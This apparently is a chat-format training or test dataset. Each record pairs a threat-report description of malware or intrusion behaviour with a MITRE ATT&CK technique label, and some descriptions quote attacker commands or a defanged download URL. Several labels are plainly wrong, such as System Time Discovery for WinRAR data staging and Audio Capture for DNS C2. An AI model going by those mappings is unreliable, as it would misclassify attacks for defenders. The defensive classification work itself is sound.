- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackMatter harvests credentials from Local Security Authority Subsystem Service (LSASS) memory using procmon."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "And, according to the collected config files, the group upgraded their malware communications from plain text http to encrypted https in October 2013"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "By using these methods, Kimsuky can gain login and password information and/or launch malware outside of some application allowlisting solutions"
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "copies itself to disk and creates an associated run key Registry entry to establish."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WhisperGate can locate files based on hardcoded file extensions."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has sent malware that required users to hit the enable button in Microsoft Excel to allow an .iqy file to be downloaded."
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mythic supports DNS-based C2 profiles."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT3 has a tool that can delete files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some APT40 malware tools can evade typical network detectiona by leveraging legitimate websites, such as GitHub, Google, and Pastebin for initial C2 communications"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Task 0x1: react_exec The react_exec command appears to execute a payload received from the server. Interestingly it attempts to first execute the payload directly from memory. Specifically it invokes a function named ei_run_memory_hrd which invokes the Apple NSCreateObjectFileImageFromMemory, NSLinkModule, NSLookupSymbolInModule, and NSAddressOfSymbol APIs to load and link the in-memory payload. In some cases the file will be set to executable via a call to chmod. Specifically it instructs the malware to spawn a background thread to execute a function named eilf_rglk_watch_routine. This function creates an event tap (via the CGEventTapCreate API), add it to the current runloop, then invokes the CGEventTapEnable to activate the event tap"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "surveys a system upon check-in to discover the system time by using the net time command."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cadelspy has the ability to capture screenshots and webcam photos."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses the command reg query “HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\InternetSettings”."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FoggyWeb can allow abuse of a compromised AD FS server's SAML token."
- },
- {
- "role": "assistant",
- "content": "T1550 - Use Alternate Authentication Material"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses svchost.exe to execute a malicious DLL included in a new service group."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The following commands are supported by the malware: Command ID Description 00 00 00 Content after command ID is written to: C:\\Users\\[Username]\\AppData\\Local\\Temp\\notepad1.exe 00 00 01 Deletes the files: C:\\Users\\[Username]\\AppData\\Local\\Temp\\notepad.exe C:\\Users\\[Username]\\AppData\\Local\\Temp\\newnotepad.exe 00 00 02 Malware exits 00 00 03 Malware downloads the URL that follows the command ID"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery', 'T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTM samples have been signed with a code-signing certificates."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can execute commands remotely by creating a new schedule task on the remote system"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TEMP.Veles has used port-protocol mismatches on ports such as 443, 4444, 8531, and 50501 during C2."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAMMERTOSS is known to use PowerShell."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UBoatRAT has used GitHub and a public blog service in Hong Kong for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As the final reconnaissance step, if the system is domain-joined, BoomBox executes an LDAP query to gather data such as distinguished name, SAM account name, email, and display name of all domain users via the filter (&(objectClass=user)(objectCategory=person"
- },
- {
- "role": "assistant",
- "content": "T1087.003 - Email Account', 'T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The dropped executable (MD5: 78734CD268E5C9AB4184E1BBE21A6EB9) contains the compressed FELIXROOT dropper component in the Portable Executable (PE) binary overlay section"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Nebulae can use DLL side-loading to gain execution."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sidewinder has used the Windows service \"winmgmts:\\\\.\\root\\SecurityCenter2\" to check installed antivirus products."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike's \"execute-assembly\" command can run a .NET executable within the memory of a sacrificial process by loading the CLR."
- },
- {
- "role": "assistant",
- "content": "T1620 - Reflective Code Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "REvil has used encrypted strings and configuration files."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Nebulae can use CMD to execute a process."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has used malware to turn off the \"RequireSigned\" feature which ensures only signed DLLs can be run on Windows."
- },
- {
- "role": "assistant",
- "content": "T1553.006 - Subvert Trust Controls: Code Signing Policy Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Confucius has used a file stealer that can examine system drives, including those other than the C drive."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WastedLocker has a command to take ownership of a file and reset the ACL permissions using the \"takeown.exe /F filepath\" command."
- },
- {
- "role": "assistant",
- "content": "T1222.001 - File and Directory Permissions Modification: Windows File and Directory Permissions Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Imminent Monitor has deleted files related to its dynamic debugger feature."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has several modules that search the Windows Registry for stored credentials: Get-UnattendedInstallFile, Get-Webconfig, Get-ApplicationHost, Get-SiteListPassword, Get-CachedGPPPassword, and Get-RegistryAutoLogon."
- },
- {
- "role": "assistant",
- "content": "T1552.002 - Unsecured Credentials: Credentials in Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A variant of Elise executes \"dir C:\\progra~1\" when initially run."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can drop a mouse-logger that will take small screenshots around at each click and then send back to the server."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The payload has a function it calls early on that tests to see which DNS query types are able to successfully reach the C2 server. It iterates through a list of types and the first DNS type to receive a response from the C2 server will be used for all communications between the payload and the C2 server, which are in the following order (editor’s note: AC is not a DNS record type but is a mode where the trojan will perform a request for an A record requiring ac as a subdomain): A AAAA AC – (see note above) CNAME MX TXT SRV SOA The payload uses the built-in Windows nslookup application with specific parameters and specially crafted subdomains to communicate with the C2"
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture', 'T1071 - Application Layer Protocol', 'T1041 - Exfiltration Over C2 Channel', 'T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT33 has utilized PowerShell to download files from the C2 server and run various scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses AES and a preshared key to decrypt the custom Base64 routine used to encode strings and scripts."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Agent Tesla can inject into known, vulnerable binaries on targeted hosts."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "From one of the hosts, we discovered that the actor executed a credential harvesting tool named Responder and moved laterally using Windows commands. Lazarus overcame network segmentation, exfiltrating data from a completely isolated network segment cut off from the internet by compromising a router virtual machine, as we explain below under “Overcoming network segmentation"
- },
- {
- "role": "assistant",
- "content": "T1557.001 - Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUNSPOT was identified on disk with a filename of \"taskhostsvc.exe\" and it created an encrypted log file at \"C:\\Windows\\Temp\\vmware-vmdmp.log\"."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Writing executables to a randomly-selected directory under Program Files, and naming the EXE to match the chosen directory name, or, if that fails, writing the executable to a system-generated temporary file name, using the EXE extension 3"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Group5 disguised its malicious binaries with several layers of obfuscation, including encrypting the files."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rising Sun has identified the OS product name from a compromised host by searching the registry for `SOFTWARE\\MICROSOFT\\Windows NT\\ CurrentVersion | ProductName`."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One variant of uses a Microsoft OneDrive account to exchange commands and stolen data with its operators."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We’ve seen the adversary staging data on a remote system or on the local system. Most of the times the data is compressed and copied at the same time. Only a handful of times the adversary copies the data first before compressing (archive collected data) and exfiltrating it. The adversary compresses and encrypts the data by using WinRAR from the command-line"
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For persistence and remote control, the script downloads another base64-encoded Python script from hxxps://ptpb[.]pw/OAZG. After several steps of de-obfuscation, we found the attackers using EmPyre for post-exploitation control. EmPyre is a Python post-exploitation agent built on cryptologically-secure communications and a flexible architecture"
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 5 shows the splash image displayed by the Enigma protector prior to executing the malicious payload, which is a wallpaper image available at wallpaperswide.com. The splash screen feature acts as a sandbox evasion technique, as it requires user interaction in the form of clicking the screen before the malicious code runs"
- },
- {
- "role": "assistant",
- "content": "T1497.002 - User Activity Based Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Frankenstein has used trojanized documents that retrieve remote templates from an adversary-controlled website."
- },
- {
- "role": "assistant",
- "content": "T1221 - Template Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The size of the image is more than 600KB and embedded in it is the encrypted IcedID main module. The encryption algorithm is RC4 and the keys are also embedded in the image at specific offset"
- },
- {
- "role": "assistant",
- "content": "T1027.003 - Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FlawedAmmyy can execute batch scripts to delete files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The files are extracted to a newly created folder with a randomized name under the same path, and the zip file is then deleted. The “AJWrDz.exe” executable path is written to the registry Run key “HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run” to achieve persistency"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Agent Tesla has he ability to perform anti-sandboxing and anti-virtualization checks."
- },
- {
- "role": "assistant",
- "content": "T1497 - Virtualization/Sandbox Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The FunnyDream Keyrecord component can capture keystrokes."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hi-Zor encrypts C2 traffic with TLS."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some versions of the Orz backdoor have 32- and 64-bit embedded DLLs, stored internally as base64 strings. Their purpose is to simply run another binary. These are used as loaders for future executable payloads, using the well-known process hollowing technique. To use the MockDll, the backdoor creates a configuration .ini file like that shown in Figure 14"
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing', 'T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To exploit the Log4j vulnerability (CVE-2021-44228), the attackers chose one of the publicly available open-source JNDI Exploit Kits, since removed from GitHub due to its enormous popularity following the vulnerability emergence. There are multiple analysis papers that explain how the vulnerability can be exploited, so we will skip the details of the actual exploitation step"
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CosmicDuke collects LSA secrets."
- },
- {
- "role": "assistant",
- "content": "T1003.004 - OS Credential Dumping: LSA Secrets"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sleeps the downloader. After that, it downloads a file from Discord. The downloaded file is in reverse byte order. Downloads file from Discord. The downloader restores the downloaded file by reversing the bytes within the file. Method that reverses the downloaded file. The restored file is a DLL and serves as the third stage of the infection chain. Retrieving third-stage public methods using Type.GetMethods"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It is used by the financially motivated GOLD SOUTHFIELD threat group, which distributes ransomware via exploit kits, scan-and-exploit techniques, RDP servers, and backdoored software installers. CTU™ researchers attribute GandCrab to the GOLD GARDEN threat group"
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application', 'T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has exploited vulnerabilities in Microsoft PowerPoint via OLE objects (CVE-2014-4114) and Microsoft Word via crafted TIFF images (CVE-2013-3906)."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An loader Trojan uses a batch script to run its payload."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Industroyer uses a custom DoS tool that leverages CVE-2015-5374 and targets hardcoded IP addresses of Siemens SIPROTEC devices."
- },
- {
- "role": "assistant",
- "content": "T1499.004 - Application or System Exploitation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WellMess can communicate to C2 with mutual TLS where client and server mutually check certificates."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The executable dispci.exe appears to be derived from the code base of the legitimate utility DiskCryptor. It acts as the disk encryption module which also installs the modified bootloader and prevents the normal boot-up process of the infected machine."
- },
- {
- "role": "assistant",
- "content": "T1561.002 - Disk Structure Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OverWatch continued to track the threat actor’s malicious behavior as they downloaded additional scripts and then executed a Base64-encoded command via PowerShell1 to retrieve malware from their toolkit"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Otherwise, the malware bypasses UAC and escalates privileges with two different approaches – one for Windows 10 and the other for older versions"
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bumblebee can use `cmd.exe` to drop and run files."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA459 has used PowerShell for execution of a payload."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kevin can hide the current window from the targeted user via the `ShowWindow` API function."
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
